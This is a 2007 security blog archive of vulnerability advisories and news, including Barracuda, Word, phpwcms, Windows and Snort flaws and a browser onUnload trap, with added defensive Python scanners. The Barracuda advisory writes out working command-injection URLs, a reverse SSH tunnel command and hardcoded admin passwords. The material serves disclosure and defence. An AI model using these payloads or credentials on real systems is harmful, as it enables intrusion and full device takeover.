Tuesday, February 27, 2007

javascript's onUnload() function

Published: 2007-02-26,
Last Updated: 2007-02-26 23:25:38 UTC

by Swa Frantzen (Version: 3)

What happens when an adept of the dark side of the force looks at the documentation on javascript's onUnload() function?



Take a look for yourself and come back, we won't go anywhere:


So something that gets called no matter how the user tries to get away from a web page. Imagine what pages you might want to get away from ...



As the MSDN article says, adding a window.open() call in such a routine becomes a nightmare for the visitor as (s)he'll never manage to get away on his/her own. Pop-up blockers should -if all goes right- detect and prevent that one case. But it gets worse: how about "location = self.location;"? Right, the visitor doesn't go away at all.



Is there anything new to this? Not as such: it's been known for years and was, e.g., discussed in August 2005 on the full-disclosure mailing lists.



One would assume that open discussion of such a function, where it is being labeled as potentially evil, would cause security-conscious developers to take note of such a dangerous function and severely limit its possibilities, or better yet get rid of it altogether.



Yet there seems to have been no such luck. Worse, there seems to have been renewed attention from those using the dark side, as evidenced by these recent reactions:



MSIE 7: CVE-2007-1091 (mitre) or CVE-2007-1091 (nist)

"Microsoft Internet Explorer 7 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via onUnload Javascript handlers. "



We've hence updated the table tracking the known vulnerabilities in Microsoft products.

Firefox: US-CERT Vulnerability Note VU#393921

"Mozilla Firefox fails to properly handle JavaScript onUnload events. Specifically, Firefox may not correctly handle freed data structures modified in the onUnload event handler possibly leading to memory corruption. By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user."

Firefox seems to have fixed it in versions 2.0.0.2 and 1.5.0.10.

Personally I have a hard time seeing how supporting onUnload() matches statements such as:

"Put safety first.

Robust new Internet Explorer 7 architecture and improved security features help protect you against malicious software, and help to keep your personal data safe from fraudulent websites and online phishing scams." (taken from http://www.microsoft.com/windows/products/winfamily/ie/default.mspx )

Firefox has a "security is important" statement just as well.



Best course of action: disable scripting, but most of you can't or don't want to do that. The second best alternative might be to use extensions such as NoScript in Firefox that allows more selective control of who gets to do remote code execution in your browser. Yes that's what allowing java, VBscript and javascript basically is: allowing random websites to hand your browser code to execute ...



--

Swa Frantzen -- NET2S
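The handler pattern the diary warns about, as an added example that is not part of the ISC diary: a small Python scanner of the kind a filtering proxy or a crawler would run over fetched pages, finding onunload/onbeforeunload handlers whose body re-navigates (the "location = self.location" trick) or calls window.open(). The regexes and the two sample pages are constructed for this illustration and are not from any real site.

```python
import re

# Handler in an HTML attribute: <body onunload="..."> or onbeforeunload="...".
_ATTR_RE = re.compile(r'\bon(before)?unload\s*=\s*(["\'])(.*?)\2', re.I | re.S)
# Handler assigned from script: window.onunload = function () { ... };
# (the body is cut at the first ';' or at </script>, enough to see the first statement)
_PROP_RE = re.compile(
    r'\b(?:window|self|document\.body)\.on(before)?unload\s*=\s*(.*?)(?:;|</script>)',
    re.I | re.S)
# Statements that keep the visitor on the page or spawn a new window.
_TRAP_RE = re.compile(
    r'window\.open\s*\('
    r'|\b(?:self\.|window\.|document\.)?location(?:\.href)?\s*=(?!=)'
    r'|\blocation\.(?:replace|assign)\s*\(',
    re.I)


def find_unload_traps(html):
    """Return (handler_kind, snippet) pairs for unload handlers that navigate or
    open windows, i.e. the "you cannot leave" trick from the diary."""
    hits = []
    for m in _ATTR_RE.finditer(html):
        kind = "on%sunload attribute" % (m.group(1) or "")
        if _TRAP_RE.search(m.group(3)):
            hits.append((kind, m.group(3).strip()))
    for m in _PROP_RE.finditer(html):
        kind = "on%sunload property" % (m.group(1) or "")
        if _TRAP_RE.search(m.group(2)):
            hits.append((kind, m.group(2).strip()))
    return hits


# Constructed sample pages (not taken from any real site).
TRAP_PAGE = """<html><body onunload="location = self.location;">
<script>window.onbeforeunload = function () { window.open('http://example.invalid/'); };</script>
</body></html>"""

BENIGN_PAGE = """<html><body onunload="cleanup(); counter == 0">
<script>window.onunload = function () { navigator.sendBeacon('/bye'); };</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("trap", TRAP_PAGE), ("benign", BENIGN_PAGE)):
        print(name, find_unload_traps(page))
```

A caveat the diary predates: current browsers ignore window.open() and navigation started from unload handlers and reduce onbeforeunload to a generic "leave this page?" prompt with no custom text, so the trap no longer works as described. The pattern is still worth flagging, because a page carrying it is a page that is trying.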

Labels: ,

Windows for Warships nears frontline service

When the Blue Screen of Death, really means death.

===================================================

By Lewis Page
Published Monday 26th February 2007 12:15 GMT

Analysis Everyone knows the differences between Windows and other operating systems. Steve Jobs has recently spent colossal sums telling us that most malware is written for Windows; also that using Windows is no fun and, even worse, seems to involve wearing a tie.

Those acquainted with the more foam-lipped Linux fanciers will also be familiar with the position that Windows use is morally corrupt, indicative of sexual perversion, and causes cancer.

A lot of customers keep buying from Microsoft, however. One may want to deploy a particular kind of hardware, perhaps used only by a few organisations. It may well be that you can only get the associated software from the hardware maker, and the vendor in question doesn't provide anything other than Windows-based machines.

One type of hardware where this is happening more and more is warships.

This shift has already been heavily criticised. Nonetheless, BAE Systems subsidiary Insyte, the UK's sole provider of warship command systems, has decided to standardise on Win2k (this was during the company's former incarnation as AMS).


The Type 45 destroyers now being launched will run Windows for Warships: and that's not all. The attack submarine Torbay has been retrofitted with Microsoft-based command systems, and as time goes by the rest of the British submarine fleet will get the same treatment, including the Vanguard class (V class). The V boats carry the UK's nuclear weapons and are armed with Trident ICBMs, tipped with multiple H-bomb warheads.

All this raises a number of worrying issues. First up is basic reliability and usability. Most of us have stared in helpless despair at the dreaded blue screen; how much worse would you feel if that wasn't just your desktop gone but your combat display, and it really was the screen of death?

Surely we can't have our jolly tars let down by possibly untrustworthy, difficult to use kit such as Windows? Especially when you reflect that cost is not an issue. When you're buying destroyers at £1bn per hull, the price difference between 26 PCs and the same number of Sun workstations barely shows up.

... rest of article on The Register.


Monday, February 26, 2007

Barracuda Networks Spam Firewall Multiple Vulnerabilities

Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001


Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.

A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.


-------

Matthew Hall (lists ecsc co uk)
Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006

Summary:

Lack of input sanitisation in the Barracuda spam firewall
web interface allows execution of commands by unauthenticated users.
Combined with privilege elevation techniques, execution of commands as
the root user is possible allowing a full system compromise.

Details:

In a follow-up investigation to bid 19276 - 'Barracuda Vulnerability:
Arbitrary File Disclosure [NNL-20060801-02]' by Greg Sinclair, further
investigation was performed by the Internet Defence Security Team and
several extra vulnerabilities were discovered, which when leveraged with
privilege escalation techniques allowed the remote execution of commands
as the root user without any authentication.

The original discovery by Greg Sinclair showed that it was possible to
open arbitrary files, either owned by the user/group 'nobody:nogroup' or
with world-read access, through the web interface using a path
sanitisation vulnerability in preview_email.cgi, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp

Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.

Using this vulnerability, it is also possible to use the pipe character
(|) to redirect the stdout of any program run to the stdin of the file
open function, printing the output of the command back to the web
interface, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20-la%20/|

It was then possible to leverage further privileges, as the user the
http daemon runs as (nobody) is granted root level access to several
system commands via the use of sudo, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/sudo%20touch%20/foo|

(Repeating the previous command should then show that the file 'foo' has
been created with root permissions in '/').

The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(as well as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)

Access to such commands as a chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the webinterface, without the use
of sudo, and would run with root privileges.

As such, a complete system compromise is possible remotely through the
web interface without any authentication.

It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' a hardcoded 'guest' user password existed,
which was 'bnadmin99'.

During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If this case is true, then it is possible to login to the web interface
as the admin user using the password 'adminbn99'.

In order to gain elevated privileges to login to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.

It was possible to expose the ssh rsa public key, which then could be
copied to a user's '.ssh/authorized_keys2' on a local machine, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/cat%20/home/emailswitch/code/config/id_rsa.pub|

With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g.:

https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/bin/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:localhost:443%20@|

It was then possible to login to 'https://127.0.0.1:8080/' with the
username of 'admin' and password of 'adminbn99' and manage the device as
an administrator.

It was noted that the original file input sanitisation vulnerability seems
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.

So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remain the same.

Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.

The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.

Exploit:

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl

Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.
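The mechanism the advisory chains together, as an added example that is neither Barracuda's code nor the advisory's: the trailing | works because Perl's two-argument open() treats a filename ending in '|' as a command whose output is to be read, so a check that only looks at the string prefix /mail/mlog/ is defeated by '..' and the pipe. The Python below models that naive check, shows a hardened replacement, and runs a detector over constructed web-server access-log lines built from the advisory's URLs. That the CGI required a literal /mail/mlog/ prefix is inferred from those URLs, not stated in the advisory, and is an assumption.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Prefix the CGI apparently required at the start of the 'file' value
# (inferred from the advisory's URLs; an assumption, not Barracuda's code).
MAILLOG_ROOT = "/mail/mlog"


def classify_file_param(raw_value):
    """Model what a Perl two-argument open() would do with the decoded value:
    'command'   - a '|' makes open() run the text as a shell command,
    'rejected'  - fails the naive string-prefix check,
    'traversal' - passes the prefix check but '..' takes it out of the log tree,
    'ok'        - stays inside the log tree."""
    value = unquote(raw_value)            # decode once, like the web server does
    if "|" in value:
        return "command"
    if not value.startswith(MAILLOG_ROOT + "/"):
        return "rejected"
    resolved = posixpath.normpath(value)  # collapses '..' the way the kernel will
    if not resolved.startswith(MAILLOG_ROOT + "/"):
        return "traversal"
    return "ok"


def safe_preview_path(raw_value):
    """Hardened replacement: reject pipe/control characters, canonicalise, then
    check containment on the canonical path. Real code should also resolve
    symlinks (os.path.realpath) before the containment check."""
    value = unquote(raw_value)
    if any(c in value for c in "|\x00\r\n") or not value.startswith(MAILLOG_ROOT + "/"):
        raise ValueError("bad file parameter")
    resolved = posixpath.normpath(value)
    if not resolved.startswith(MAILLOG_ROOT + "/"):
        raise ValueError("path escapes the mail log directory")
    return resolved


def scan_access_log(lines):
    """Flag requests to preview_email.cgi whose raw file= value traverses or pipes.
    Returns (client, verdict, decoded_value) for each hit, in log order."""
    findings = []
    for line in lines:
        try:
            request = line.split('"')[1]          # "GET /path?query HTTP/1.1"
            url = request.split()[1]
        except IndexError:
            continue
        parts = urlsplit(url)
        if not parts.path.endswith("/cgi-bin/preview_email.cgi"):
            continue
        for pair in parts.query.split("&"):       # keep the raw value: decode exactly once
            key, _, raw = pair.partition("=")
            if key != "file":
                continue
            verdict = classify_file_param(raw)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, unquote(raw)))
    return findings


# Constructed access-log lines modelled on the advisory's URLs; not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Aug/2006:22:10:01 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/123/msg.eml HTTP/1.1" 200 512',
    '203.0.113.5 - - [03/Aug/2006:22:10:07 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/backup/periodic_config.txt.tmp HTTP/1.1" 200 8192',
    '203.0.113.5 - - [03/Aug/2006:22:10:12 +0000] "GET /cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20-la%20/| HTTP/1.1" 200 2048',
    '198.51.100.9 - - [03/Aug/2006:22:11:00 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, verdict, value in scan_access_log(SAMPLE_LOG):
        print(client, verdict, value)
```

The order of checks in safe_preview_path matters: the pipe test runs on the decoded value before any path handling, because in Perl the '|' is interpreted by open() itself, not by the filesystem, so no amount of path canonicalisation removes it.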


Microsoft Word Macro Security Warning Bug and Drawing Object Memory Corruption Error Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1017639
SecurityTracker URL: http://securitytracker.com/id?1017639
CVE Reference: CVE-2007-0208 , CVE-2007-0209
Date: Feb 13 2007
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Version(s): 2000, 2002, 2003, 2004 for Mac, 2004
Description: Two vulnerabilities were reported in Microsoft Word. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a document with a specially crafted macro that, when loaded by the target user, will bypass the macro security warning and execute arbitrary code on the target system [CVE-2007-0208]. The code will run with the privileges of the target user.

A remote user can create a document with a specially crafted drawing object, when loaded by the target user, will trigger a memory corruption error and execute arbitrary code on the target system [CVE-2007-0209]. The code will run with the privileges of the target user.

Microsoft Word 2007 is not affected.

Microsoft credits USAA with reporting the macro security bypass vulnerability.
Impact: A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution: The vendor has issued the following fixes:

Microsoft Word 2000:

http://www.microsoft.com/downloads/details.aspx?FamilyId=F1E61E6A-BE3D-4536-AF76-A11D5CE67199

Microsoft Word 2002:

http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D

Microsoft Word 2003:

http://www.microsoft.com/downloads/details.aspx?FamilyID=882F8503-DA72-43C9-B556-A002EC58F289

Microsoft Word Viewer 2003:

http://www.microsoft.com/downloads/details.aspx?FamilyId=FB59798B-AFE2-4103-9991-CBDD7686F9AD

Microsoft Works Suite 2004:

http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D

Microsoft Works Suite 2005:

http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D

Microsoft Works Suite 2006:

http://www.microsoft.com/downloads/details.aspx?FamilyId=A1CA8DD7-0622-4D66-A85F-A6586545EF9D

Microsoft Office 2004 for Mac:

http://www.microsoft.com/mac/

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms07-014.mspx
Vendor URL: www.microsoft.com/technet/security/bulletin/ms07-014.mspx


phpwcms act_formmailer.php and mail_file_form.php header injection

phpwcms-referer-security-bypass (26130)

Description:

phpwcms is a Content Management System (CMS) written in PHP. phpwcms versions 1.2.5-DEV and prior and versions 1.1-RC4 and prior are vulnerable to header injection, caused by improper validation of the HTTP REFERER header by the act_formmailer.php and mail_file_form.php scripts. A remote attacker could exploit this vulnerability to use an affected system to send arbitrary email and spam messages.

Platforms Affected:
Data General: DG/UX Any version
Hewlett-Packard Company: HP-UX Any version
Hewlett-Packard Company: Tru64 UNIX Any version
IBM: AIX Any version
Linux: Linux Any version
Microsoft Corporation: Windows 95
Microsoft Corporation: Windows 98
Microsoft Corporation: Windows 98 Second Edition
Microsoft Corporation: Windows Me
Microsoft Corporation: Windows XP
Microsoft Corporation: Windows 2000 Any version
Microsoft Corporation: Windows 2003 Any version
Microsoft Corporation: Windows NT 4.0
phpwcms: phpwcms 1.1-RC4 and prior
phpwcms: phpwcms 1.2.5-DEV and prior
Santa Cruz Operation, Inc.: SCO Unix Any version
SGI: IRIX Any version
Sun Microsystems, Inc.: Solaris Any version
Wind River Systems, Inc.: BSD Any version

Remedy:

Apply the patch for this vulnerability, available from the phpwcms Web site. See References.

Consequences:

Bypass Security

References:
FrSIRT/ADV-2006-1556, phpwcms Remote Code Execution and Mail Form Security Bypass Vulnerabilities at http://www.frsirt.com/english/advisories/2006/1556.
phpwcms Forum, Fri Apr 21, 2006 16:11, Security Alert 1.2.6 CVS at http://www.phpwcms.de/forum/viewtopic.php?t=10958.
phpwcms Web site, phpwcms at http://www.phpwcms.de.

Standards associated with this entry:
CVE-2006-7020: CRLF injection vulnerability in (1) include/inc_act/act_formmailer.php and possibly (2) sample_ext_php/mail_file_form.php in phpwcms 1.2.5-DEV and earlier, and 1.1 before RC4, allows remote attackers to modify HTTP headers and send spam e-mail via a spoofed HTTP Referer (HTTP_REFERER).

Reported:

Apr 21, 2006

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

Copyright (c) 1994-2007 Internet Security Systems, Inc. All rights reserved worldwide.
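How a CR/LF inside the Referer becomes an extra mail header, as an added example that is not phpwcms's code: the entry does not say into which header the referrer was copied, so the X-Form-Referer header and the mail()-style header block below are assumptions chosen to show the pattern, and the spoofed referrer value is constructed. The vulnerable assembly is shown beside a hardened one that refuses line breaks instead of silently stripping them.

```python
import re

CRLF = "\r\n"


def vulnerable_headers(sender, subject, referer):
    """Naive header assembly of the kind the entry describes (a pattern, not
    phpwcms's code): the referrer is interpolated verbatim, so a CR/LF inside it
    ends the line and whatever follows is parsed as further headers."""
    return (f"From: {sender}{CRLF}"
            f"Subject: {subject}{CRLF}"
            f"X-Form-Referer: {referer}{CRLF}")   # header name is an assumption


def parse_headers(block):
    """Split a header block into (name, value) pairs the way an MTA would."""
    fields = []
    for line in block.split(CRLF):
        if not line:
            continue
        name, _, value = line.partition(":")
        fields.append((name.strip(), value.strip()))
    return fields


_LINE_BREAK = re.compile(r"[\r\n\x00]")


def safe_header_value(value):
    """Reject anything that could terminate the header line; do not 'strip' it,
    because silently repairing attacker input hides the attempt."""
    if _LINE_BREAK.search(value):
        raise ValueError("line break in header value")
    return value


def hardened_headers(sender, subject, referer):
    return (f"From: {safe_header_value(sender)}{CRLF}"
            f"Subject: {safe_header_value(subject)}{CRLF}"
            f"X-Form-Referer: {safe_header_value(referer)}{CRLF}")


# Constructed spoofed Referer: the client controls it completely, so a bare
# CRLF followed by a Bcc: header is all it takes to turn the form into a relay.
SPOOFED_REFERER = ("http://example.invalid/contact.php" + CRLF +
                   "Bcc: victim1@example.invalid, victim2@example.invalid")

if __name__ == "__main__":
    print(parse_headers(vulnerable_headers("form@example.invalid", "Contact", SPOOFED_REFERER)))
```

The same check belongs on every request-derived value that reaches PHP's mail() additional_headers argument, not only the referrer; a bare "\n" is enough for most MTAs, so the test covers both CR and LF.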


Check Point Firewall-1 Internal Certificate Authority (ICA) Information Disclosure

OSVDB ID: 31592
Disclosure Date: Jan 1, 2006

Description:

Check Point Firewall-1 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker connects to port 18264 and accesses the internal certificate for the server, revealing the presence of the firewall. This may also disclose certificate revocation lists and other information resulting in a loss of confidentiality.

Vulnerability Classification:
Remote/Network Access Required
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern
Web Related

Products:
Check Point Software Technologies, Inc. FireWall-1 Unknown or Unspecified

Solution:

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Restrict access to the Internal Certificate Authority interface to internal hosts.

Manual Testing Notes:

http://[target]:18264/

External References:
Nessus Script ID: 22094
Vendor URL: http://www.checkpoint.com/products/firewall-1/index.html

Credit:

OSVDB does not have information on who discovered this vulnerability. If you have credit information please send it to OSVDB Moderators
Vulnerability Status:

This entry was last updated on Feb 14, 2007. If you have additional information or corrections for this vulnerability please submit them to OSVDB Moderators.


Danger inside the firewall

Interesting story about unauthorised people using Wifi in a secure zone, thereby creating a hole in the firewall.

--------------------------------------------------------------------------------------------
That nice, new Linksys wireless router might as well have been a ticking bomb

By Anonymous
February 20, 2007
http://www.infoworld.com/article/07/02/20/09OPrecord_1.html

Between the latest firewall technology and advanced intrusion detection systems, IT professionals are breathing a little easier. This is a big mistake. It may be easier to protect the network from external attack these days, but the greatest security risks still come from inside the DMZ.

I work for a small, single-branch credit union in Minneapolis, and I am a one-man shop. If there’s a technical problem, I’m the guy who has to fix it. Once a year, auditors from a large accounting firm come in to perform an audit for our year-end financial statements. In the past, the only tech support I needed to provide was to set up a local printer they could use from their laptops. I couldn’t have given them access to my network if I wanted to, as their techs had their laptops locked down, and I couldn’t make any changes to their setup.

This year the accountants brought their own printer, so they didn’t need any assistance at all. Fine with me; I always have plenty to do. They showed up on Monday. Tuesday morning I arrived for work, opened up my laptop, and was suddenly asked if I would like to join wireless network xx-xx. I recognized the SSID as belonging to our auditors. My first thought was that one of them had left her laptop running in our boardroom overnight and had somehow screwed up the network settings, allowing it to accept connections. I immediately joined this network to see what was going on.

I had no trouble connecting to the router at 192.168.1.1 via port 80, and signing into the management console with the default password. I now had full access to the router, and I used nmap to scan all the computers connected to it. They all had the same ports open, including 135 and 139. All our financial data was potentially at risk.

Moments later I was running down the hall to the boardroom where the auditors were encamped. The first thing I saw, in the middle of the boardroom table, was a nice, new Linksys wireless router with a network printer cabled to it. Wow! It might as well have been a ticking bomb! How could their techs send them out with this equipment, especially configured this way, without security training?

When the accountants arrived half an hour later, I asked them if they were aware that the wireless router and the laptops were unsecured. They had no idea what I was talking about. They assured me that they weren’t even using the wireless functionality; sure enough, they were all cabled to it directly.

I phoned the auditors’ supervisor and told him I was seriously unhappy about our confidential financial data residing on laptops that were unsecured. He told me to calm down; even if the auditors’ laptops were on a wireless network, what could intruders do without a username and password to connect to the shares?

I don’t know about you, but my faith in Windows security on an open network, especially without additional firewall protection, isn’t that high. So, using the router’s Admin console, I disabled its wireless functionality altogether. I was further tempted to change the router’s password, or maybe leave some ominous messages on the auditors’ laptops just to prove a point. But I didn’t. They’ll have to learn their lesson the hard way, at a later date, with some other company’s data.


Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW Information Leak

Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW information leak

Author: 3APA3A, http://securityvulns.com

Affected: Microsoft Windows 2000,XP,2003,Vista

Exploitable: Yes

Type: Remote (from local network), authentication required (NULL session was not tested).

Class: Information leak

CVE: CVE-2007-0843

Intro:
It's a very simple yet interesting vulnerability. The ReadDirectoryChangesW()
API allows an application to monitor directory changes in real time. The
bWatchSubtree parameter of this function allows monitoring changes
within the whole directory tree rooted at the monitored directory. To
monitor changes, the directory must be opened with LIST access. The function
returns the list of modified files with the type of modification. File
modification refers to any modification of the file record in the directory.



Vulnerability: ReadDirectoryChangesW() doesn't check user's permissions for child directories.

Impact:
Any unprivileged user with LIST access to a parent directory can monitor
any files in child directories regardless of the files' permissions. Because
by default Windows updates the access time of any accessed file on NTFS
volumes, this makes it possible for the user to gather information about
NTFS-protected files: their names and the time of access to the files
(reading, writing, creation, deletion, renaming, etc.). Filenames may
contain sensitive information or leak information about a user's behaviour
(e.g. cookie files).


Exploit:

http://securityvulns.com/files/spydir.c

Usage example:

spydir \\corpsrv\corpdata



I believe you'll find this utility useful regardless of this security
issue. It shows the names of accessed/modified files for a given directory in
real time (it seems there are non-security bugs in the ReadDirectoryChangesW
implementation, e.g. you cannot see non-ASCII names and some changes
are missing).



Compiled version can be downloaded from http://securityvulns.com/soft/



Workaround:

Avoid creating more secure folders inside less secure ones. Avoid putting
sensitive data in document names.


Vendor (Microsoft):


January 17, 2006: Initial vendor notification
January 18, 2006: Vendor reply (assigned)
January 26, 2006: 2nd vendor notification
February 7, 2006: 3rd vendor notification
February 9, 2006: Vendor accepted vulnerability as "service pack class" for Windows XP and Windows 2003.
February 9, 2006: Accepted to wait until SP
February 22, 2006: Vendor gives SP timelines (late 2006 for W2K3 SP2 and 2007 for XP SP3)
February 22, 2007: Public release, because Windows Vista is released with the same vulnerability.
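The workaround's "more secure folder inside a less secure one" condition, as an added example that is not part of 3APA3A's advisory or of the spydir tool: a Python audit over a constructed table of which principals hold LIST (FILE_LIST_DIRECTORY) on each directory of a share. It reports every principal who cannot list a directory but can list one of its ancestors, which is exactly the position from which ReadDirectoryChangesW() with bWatchSubtree leaks names and change events. The share paths and principals are made up; on a real server the table would be filled from icacls or Get-Acl output.

```python
# Which principals hold LIST (FILE_LIST_DIRECTORY) on each directory.
# Constructed sample, not real data: on a real server fill this from icacls or Get-Acl.
SAMPLE_ACLS = {
    r"\\corpsrv\corpdata": {"Domain Users", "Finance", "Admins"},
    r"\\corpsrv\corpdata\public": {"Domain Users", "Finance", "Admins"},
    r"\\corpsrv\corpdata\finance": {"Finance", "Admins"},
    r"\\corpsrv\corpdata\finance\payroll": {"Admins"},
}


def is_ancestor(ancestor, path):
    """True if 'path' lies below 'ancestor' (case-insensitive, like NTFS)."""
    return path.lower().startswith(ancestor.rstrip("\\").lower() + "\\")


def find_watchable_dirs(acls):
    """Report (principal, watched_ancestor, hidden_dir) for every principal who
    cannot list hidden_dir but can list watched_ancestor: opening the ancestor
    with LIST access and calling ReadDirectoryChangesW(bWatchSubtree=TRUE) shows
    them file names and change events inside hidden_dir regardless of its ACL."""
    findings = []
    for hidden, hidden_listers in acls.items():
        for ancestor, ancestor_listers in acls.items():
            if not is_ancestor(ancestor, hidden):
                continue
            for principal in sorted(ancestor_listers - hidden_listers):
                findings.append((principal, ancestor, hidden))
    return sorted(findings)


def exposed_to(acls, directory):
    """Principals who can observe 'directory' through some listable ancestor."""
    return {p for p, _, d in find_watchable_dirs(acls) if d == directory}


if __name__ == "__main__":
    for principal, ancestor, hidden in find_watchable_dirs(SAMPLE_ACLS):
        print(f"{principal!r} can watch {hidden} via {ancestor}")
```

Because the watch needs LIST on the ancestor, giving the wider group only Traverse (so they can reach a deeper folder by full path without enumerating the parent) also closes the hole; the audit above treats only LIST as the dangerous right, matching the advisory's precondition.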


F-22 Computer Glitch

CNN television this morning reported that every fighter completely lost all navigation and communications when they crossed the international date line. They reportedly had to turn around and follow their tankers by visual contact back to Hawaii. According to the CNN story, if they had not been with their tankers, or the weather had been bad, this would have been serious. CNN has not put up anything on their website yet.


Friday, February 23, 2007

Microsoft Internet Explorer HTML tag parsing denial of service

Vulnerability Summary CVE-2006-7030

Description:

Microsoft Internet Explorer is vulnerable to a denial of service caused by a NULL pointer dereference that can occur when processing a malformed HTML document. A remote attacker could create a malicious Web page containing malformed HTML to cause a victim's browser to crash, if the victim could be persuaded to browse to the malicious page.

Note: It may also be possible for this vulnerability to be exploited for remote code execution.

Platforms Affected:
Microsoft Corporation: Microsoft Internet Explorer 6.0
Microsoft Corporation: Microsoft Internet Explorer 6.0 SP2
Microsoft Corporation: Windows 95
Microsoft Corporation: Windows 98
Microsoft Corporation: Windows 98 Second Edition
Microsoft Corporation: Windows Me
Microsoft Corporation: Windows XP
Microsoft Corporation: Windows 2000 Any version
Microsoft Corporation: Windows 2003 Any version
Microsoft Corporation: Windows NT 4.0

Remedy:

No remedy available as of June 2006.

Consequences:

Denial of Service

References:
BugTraq Mailing List, Fri May 26 2006 - 11:56:28 CDT, Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2 at http://archives.neohapsis.com/archives/bugtraq/2006-05/0567.html.
BugTraq Mailing List, Thu May 25 2006 - 17:53:03 CDT, [BuHa-Security] DoS Vulnerability in MS IE 6 SP2 at http://archives.neohapsis.com/archives/bugtraq/2006-05/0546.html.

Standards associated with this entry:
BID-18112: Microsoft Internet Explorer Malformed HTML Parsing Denial of Service Vulnerability

Reported:

May 25, 2006




Thursday, February 22, 2007

2007-02-19 Sourcefire Advisory: Vulnerability in Snort DCE/RPC Preprocessor

Summary:
Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. This preprocessor is vulnerable to a stack-based buffer overflow that could potentially allow attackers to execute code with the same privileges as the Snort binary. Sourcefire has prepared updates for Snort open-source software to address this issue.

This vulnerability has been identified as CVE-2006-5276.

Snort Versions Affected:
Snort 2.6.1, 2.6.1.1, and 2.6.1.2
Snort 2.7.0 beta 1
This vulnerability also affects Sourcefire commercial products. For information and updates for Sourcefire products, please go to the Sourcefire support site.

Mitigating Factors:


Users who have disabled the DCE/RPC preprocessor are not vulnerable. However, the DCE/RPC preprocessor is enabled by default.

Recommended Actions:
Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately.
Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2.
Workarounds:
